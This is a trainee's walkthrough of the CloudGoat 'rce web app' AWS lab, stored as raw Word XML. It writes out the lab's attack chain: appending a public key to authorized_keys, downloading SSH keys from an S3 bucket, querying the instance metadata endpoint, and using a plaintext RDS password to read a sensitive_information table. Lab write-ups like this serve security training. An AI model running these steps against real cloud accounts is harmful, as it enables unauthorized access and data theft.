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C0D23" w14:textId="77777777" w:rsidR="009D773D" w:rsidRPr="009D773D" w:rsidRDefault="009D773D" w:rsidP="009D773D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D773D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cloud DFIR: Recap and CloudGoat Practice : rce web app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D3D469" w14:textId="72C0AF90" w:rsidR="005E788F" w:rsidRDefault="009D773D" w:rsidP="009D773D">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="009D773D">
        <w:t>BoB 13th digital forensic track tranee, DoHwan Ji</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C94DDE" w14:textId="466B205E" w:rsidR="009D773D" w:rsidRDefault="009D773D" w:rsidP="009D773D"/>
    <w:p w14:paraId="4AA5FB06" w14:textId="1C026CAB" w:rsidR="00D060B7" w:rsidRDefault="00D060B7" w:rsidP="009D773D">
      <w:r w:rsidRPr="00D060B7">
        <w:t>Prior to starting, it may differ from the previous content because the environment in which it was conducted until the intermediate result is gone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5A709F" w14:textId="4B6BBE99" w:rsidR="00E31DEA" w:rsidRDefault="00E31DEA" w:rsidP="009D773D">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nd this is changed informations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8479E8" w14:textId="7FAC2110" w:rsidR="00E31DEA" w:rsidRPr="00E31DEA" w:rsidRDefault="00E31DEA" w:rsidP="009D773D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E31DEA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="097D5874" wp14:editId="38CE64A3">
            <wp:extent cx="5731510" cy="3219450"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="113455408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554080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1AAC2" w14:textId="205CD693" w:rsidR="00E31DEA" w:rsidRDefault="00E31DEA" w:rsidP="009D773D">
      <w:r w:rsidRPr="00E31DEA">
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E31DEA">
        <w:t>cg-lb-rce-web-app-cgidi2dsmfbxdx-29667134.us-east-1.elb.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9A443D" w14:textId="3A20A002" w:rsidR="00883F76" w:rsidRDefault="00883F76" w:rsidP="009D773D">
      <w:r w:rsidRPr="00883F76">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10A74E49" wp14:editId="0B3E4962">
            <wp:extent cx="5731510" cy="1798955"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1275783912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783912" name="그림 1" descr="텍스트, 스크린샷, 폰트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0C50" w14:textId="77777777" w:rsidR="00883F76" w:rsidRDefault="00883F76" w:rsidP="009D773D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F448A66" w14:textId="76C304EB" w:rsidR="00E31DEA" w:rsidRPr="00E31DEA" w:rsidRDefault="00E31DEA" w:rsidP="009D773D">
      <w:r w:rsidRPr="00E31DEA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32A09459" wp14:editId="1AF00A87">
            <wp:extent cx="5731510" cy="804545"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="176896238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9623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61787" w14:textId="35E30090" w:rsidR="001A2F06" w:rsidRDefault="001A2F06" w:rsidP="009D773D">
      <w:r w:rsidRPr="001A2F06">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6099757E" wp14:editId="6B13E765">
            <wp:extent cx="5731510" cy="2910840"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="2128863288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863288" name="그림 1" descr="텍스트, 스크린샷, 폰트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66F6A" w14:textId="2E6655CB" w:rsidR="009D773D" w:rsidRDefault="009D773D" w:rsidP="009D773D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Next I</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m going to find that aws server</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s ip address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD520B1" w14:textId="27EB6D3B" w:rsidR="009D773D" w:rsidRDefault="001A2F06" w:rsidP="009D773D">
      <w:r w:rsidRPr="001A2F06">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DCA4B8D" wp14:editId="3D7E5AD7">
            <wp:extent cx="5731510" cy="4604385"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="116323476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234763" name="그림 1" descr="텍스트, 스크린샷, 폰트, 번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BEBB4" w14:textId="736E5B15" w:rsidR="001A2F06" w:rsidRDefault="001A2F06" w:rsidP="009D773D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">I used curl ifconfig.co but </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>doesn’t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> work. </w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">o </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> use alternative command curl ifconfig.me</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD88664" w14:textId="0D3867F4" w:rsidR="001A2F06" w:rsidRDefault="001A2F06" w:rsidP="009D773D">
      <w:r w:rsidRPr="001A2F06">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47F8BAF4" wp14:editId="300D86CB">
            <wp:extent cx="5731510" cy="2905760"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="91892906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929063" name="그림 1" descr="텍스트, 스크린샷, 폰트, 번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DEA22" w14:textId="1BC04307" w:rsidR="001A2F06" w:rsidRDefault="001A2F06" w:rsidP="001A2F06">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">nd </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> try to enter server </w:t>
      </w:r>
      <w:r>
        <w:t>wit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">h ssh using key. Doing easy, </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> copy my pub key in </w:t>
      </w:r>
      <w:r w:rsidRPr="001A2F06">
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CF12CB" w14:textId="5248637F" w:rsidR="001A2F06" w:rsidRPr="001A2F06" w:rsidRDefault="001A2F06" w:rsidP="001A2F06">
      <w:r w:rsidRPr="001A2F06">
        <w:t>echo "&lt;publicKey&gt;" &gt;&gt; /home/ubuntu/.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA2768D" w14:textId="317C520D" w:rsidR="001A2F06" w:rsidRDefault="001A2F06">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09648781" w14:textId="567609AE" w:rsidR="001A2F06" w:rsidRDefault="001A2F06" w:rsidP="009D773D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Now Change Profile into McDuck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75673EF9" w14:textId="7E57BDD5" w:rsidR="001A2F06" w:rsidRDefault="001A2F06" w:rsidP="009D773D">
      <w:r w:rsidRPr="001A2F06">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="071A83CD" wp14:editId="75813B45">
            <wp:extent cx="5731510" cy="989965"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="77681547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815475" name="그림 1" descr="텍스트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61F21" w14:textId="28B90166" w:rsidR="001A2F06" w:rsidRDefault="00F64674" w:rsidP="009D773D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">nd </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> try to find ssh in </w:t>
      </w:r>
      <w:r w:rsidRPr="00F64674">
        <w:t>cg-keystore-s3-bucket-rce-web-app-cgidi2dsmfbxdx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0255DA" w14:textId="00E64C9D" w:rsidR="001A2F06" w:rsidRDefault="00F64674" w:rsidP="009D773D">
      <w:r w:rsidRPr="00F64674">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E15D8D6" wp14:editId="18A6BC90">
            <wp:extent cx="5731510" cy="835025"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="5974564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45645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BF4EF" w14:textId="51628B76" w:rsidR="00F64674" w:rsidRPr="00F64674" w:rsidRDefault="00F64674" w:rsidP="009D773D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">nter </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F64674">
        <w:t>aws s3 ls s3://cg-keystore-s3-bucket-rce-web-app-cgidi2dsmfbxdx --recursive --profile McDuck</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> can check ssh key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCC44C2" w14:textId="4F231CC4" w:rsidR="00F64674" w:rsidRDefault="00F64674" w:rsidP="009D773D">
      <w:r w:rsidRPr="00F64674">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="111378FA" wp14:editId="70D101D4">
            <wp:extent cx="5731510" cy="304800"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="29770313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7031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DC2E4" w14:textId="69221A1B" w:rsidR="00F64674" w:rsidRDefault="00585E68" w:rsidP="009D773D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Using this command. It makes </w:t>
      </w:r>
      <w:r>
        <w:t>downloading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750ACE3C" w14:textId="77777777" w:rsidR="00585E68" w:rsidRDefault="00585E68" w:rsidP="00585E68">
      <w:r>
        <w:t>mkdir mcduck &amp;&amp; cd mcduck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A96C397" w14:textId="77777777" w:rsidR="00585E68" w:rsidRDefault="00585E68" w:rsidP="00585E68">
      <w:r>
        <w:t>aws s3 cp s3://cg-keystore-s3-bucket-rce-web-app-cgidi2dsmfbxdx/cloudgoat . --profile McDuck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E5D9F8" w14:textId="44DA51FF" w:rsidR="00585E68" w:rsidRDefault="00585E68" w:rsidP="00585E68">
      <w:r>
        <w:t>aws s3 cp s3://cg-keystore-s3-bucket-rce-web-app-cgidi2dsmfbxdx/cloudgoat.pub . --profile McDuck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A76C332" w14:textId="2D990DC8" w:rsidR="00585E68" w:rsidRDefault="00585E68" w:rsidP="00585E68">
      <w:r w:rsidRPr="00585E68">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63B27025" wp14:editId="7F4538B2">
            <wp:extent cx="5731510" cy="584200"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="3412429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2429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15B64" w14:textId="5C35ABF8" w:rsidR="00E25631" w:rsidRDefault="00E25631" w:rsidP="00585E68">
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ut </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> try to enter ssh server but </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> doesn</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">t work. </w:t>
      </w:r>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">o </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> change my keyfiles permission like below image.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039777D8" w14:textId="0AC6003D" w:rsidR="00E25631" w:rsidRDefault="00E25631" w:rsidP="00585E68">
      <w:r w:rsidRPr="00E25631">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6903DC0E" wp14:editId="0BA1B664">
            <wp:extent cx="5731510" cy="5725160"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="89507697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7697" name="그림 1" descr="텍스트, 스크린샷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BE51C" w14:textId="55E7022A" w:rsidR="00E25631" w:rsidRDefault="00E25631" w:rsidP="00585E68">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">nd </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> can enter ssh server </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00E25631">
        <w:t xml:space="preserve">ssh -i ~/.ssh/cloudgoat </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00355697">
          <w:rPr>
            <w:rStyle w:val="ac"/>
          </w:rPr>
          <w:t>ubuntu@54.224.0.73</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069082EC" w14:textId="5006843F" w:rsidR="00E25631" w:rsidRDefault="00E25631" w:rsidP="00585E68">
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nter below command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D55CB7E" w14:textId="77777777" w:rsidR="00E25631" w:rsidRPr="00E25631" w:rsidRDefault="00E25631" w:rsidP="00E25631">
      <w:r w:rsidRPr="00E25631">
        <w:t>sudo apt-</w:t>
      </w:r>
      <w:r w:rsidRPr="00E25631">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00E25631">
        <w:t xml:space="preserve"> install awscli</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A588F6" w14:textId="77777777" w:rsidR="00E25631" w:rsidRPr="00E25631" w:rsidRDefault="00E25631" w:rsidP="00E25631">
      <w:r w:rsidRPr="00E25631">
        <w:t>aws s3 ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD7C8EA" w14:textId="7EA35755" w:rsidR="00E25631" w:rsidRPr="00E25631" w:rsidRDefault="00E25631" w:rsidP="00E25631">
      <w:r w:rsidRPr="00E25631">
        <w:t>aws s3 ls s3://</w:t>
      </w:r>
      <w:r w:rsidR="00A75FDA" w:rsidRPr="00A75FDA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A75FDA" w:rsidRPr="00A75FDA">
        <w:t>cg-secret-s3-bucket-rce-web-app-cgidi2dsmfbxdx</w:t>
      </w:r>
      <w:r w:rsidRPr="00E25631">
        <w:t>--recursive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DDE40D" w14:textId="77777777" w:rsidR="00A75FDA" w:rsidRDefault="00A75FDA" w:rsidP="00E25631">
      <w:r w:rsidRPr="00A75FDA">
        <w:t>aws s3 cp s3://cg-secret-s3-bucket-rce-web-app-cgidi2dsmfbxdx/db.txt . | cat db.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E4C2A0" w14:textId="0BACDE6E" w:rsidR="00E25631" w:rsidRPr="00E25631" w:rsidRDefault="00E25631" w:rsidP="00E25631">
      <w:r w:rsidRPr="00E25631">
        <w:t>aws rds describe-db-instances --region us-east-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628CEEB4" w14:textId="77777777" w:rsidR="00E25631" w:rsidRDefault="00E25631" w:rsidP="00585E68"/>
    <w:p w14:paraId="01C77A7F" w14:textId="057FA5E1" w:rsidR="00A75FDA" w:rsidRDefault="00A75FDA" w:rsidP="00585E68">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> can see this output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A11E5F" w14:textId="2086B5BA" w:rsidR="00A75FDA" w:rsidRDefault="00A75FDA" w:rsidP="00585E68">
      <w:r w:rsidRPr="00A75FDA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E47C081" wp14:editId="415A1EAF">
            <wp:extent cx="5731510" cy="2115185"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="181715434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154343" name="그림 1" descr="텍스트, 스크린샷, 폰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3D847" w14:textId="77777777" w:rsidR="00A75FDA" w:rsidRDefault="00A75FDA" w:rsidP="00585E68"/>
    <w:p w14:paraId="6047FA50" w14:textId="34F5E460" w:rsidR="00A75FDA" w:rsidRDefault="00A75FDA" w:rsidP="00585E68">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nd type this commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390E5184" w14:textId="47D4BA23" w:rsidR="00A75FDA" w:rsidRDefault="00A75FDA" w:rsidP="00585E68">
      <w:r w:rsidRPr="00A75FDA">
        <w:t>psql postgresql://cgadmin:Purplepwny2029@cg-rds-instance-rce-web-app-cgidi2dsmfbxdx.c1ykaa0sw4zn.us-east-1.rds.amazonaws.com:5432/cloudgoat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7A66A1" w14:textId="77777777" w:rsidR="00A75FDA" w:rsidRPr="00A75FDA" w:rsidRDefault="00A75FDA" w:rsidP="00A75FDA">
      <w:r w:rsidRPr="00A75FDA">
        <w:t>curl http://169.254.169.254/latest/user-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CD6B31" w14:textId="77777777" w:rsidR="00A75FDA" w:rsidRPr="00A75FDA" w:rsidRDefault="00A75FDA" w:rsidP="00A75FDA">
      <w:r w:rsidRPr="00A75FDA">
        <w:t>\dt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C31FD83" w14:textId="6A3C39F5" w:rsidR="00A75FDA" w:rsidRDefault="00A75FDA" w:rsidP="00585E68">
      <w:r w:rsidRPr="00A75FDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r w:rsidRPr="00A75FDA">
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="00A75FDA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidRPr="00A75FDA">
        <w:t xml:space="preserve"> sensitive_information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A69634" w14:textId="1AD182C8" w:rsidR="00A75FDA" w:rsidRDefault="00A75FDA" w:rsidP="00585E68">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> can see the key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092051B1" w14:textId="3E67E855" w:rsidR="00A75FDA" w:rsidRPr="00A75FDA" w:rsidRDefault="00A75FDA" w:rsidP="00585E68">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A75FDA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3348EC35" wp14:editId="3343B7AA">
            <wp:extent cx="5506218" cy="1829055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="206861583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61583" name="그림 1" descr="텍스트, 스크린샷, 폰트, 라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FDA" w:rsidRPr="00A75F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AB5B77" w14:textId="77777777" w:rsidR="00B05E9F" w:rsidRDefault="00B05E9F" w:rsidP="00E31DEA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6958D0AD" w14:textId="77777777" w:rsidR="00B05E9F" w:rsidRDefault="00B05E9F" w:rsidP="00E31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FCBA80" w14:textId="77777777" w:rsidR="00B05E9F" w:rsidRDefault="00B05E9F" w:rsidP="00E31DEA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4C25DEDD" w14:textId="77777777" w:rsidR="00B05E9F" w:rsidRDefault="00B05E9F" w:rsidP="00E31D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027"/>
    <w:rsid w:val="001A2F06"/>
    <w:rsid w:val="00585E68"/>
    <w:rsid w:val="005908C5"/>
    <w:rsid w:val="005E788F"/>
    <w:rsid w:val="00883F76"/>
    <w:rsid w:val="009D773D"/>
    <w:rsid w:val="00A75FDA"/>
    <w:rsid w:val="00B05E9F"/>
    <w:rsid w:val="00B40027"/>
    <w:rsid w:val="00CB3B9A"/>
    <w:rsid w:val="00CC0B58"/>
    <w:rsid w:val="00D060B7"/>
    <w:rsid w:val="00D651DA"/>
    <w:rsid w:val="00E25631"/>
    <w:rsid w:val="00E31DEA"/>
    <w:rsid w:val="00F6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82171F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D6B6052F-08D5-4596-A069-AFA084D56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4002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400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4002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4002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4002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4002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4002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4002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4002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4002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4002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4002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B400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400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400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400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400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4002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4002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40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4002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4002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400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4002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4002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4002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400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4002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40027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E31DE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E31DEA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char4"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E31DE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E31DEA"/>
  </w:style>
  <w:style w:type="character" w:styleId="ac">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E25631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256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5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mailto:ubuntu@54.224.0.73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지도환</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>지도환</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-18T04:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-18T14:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>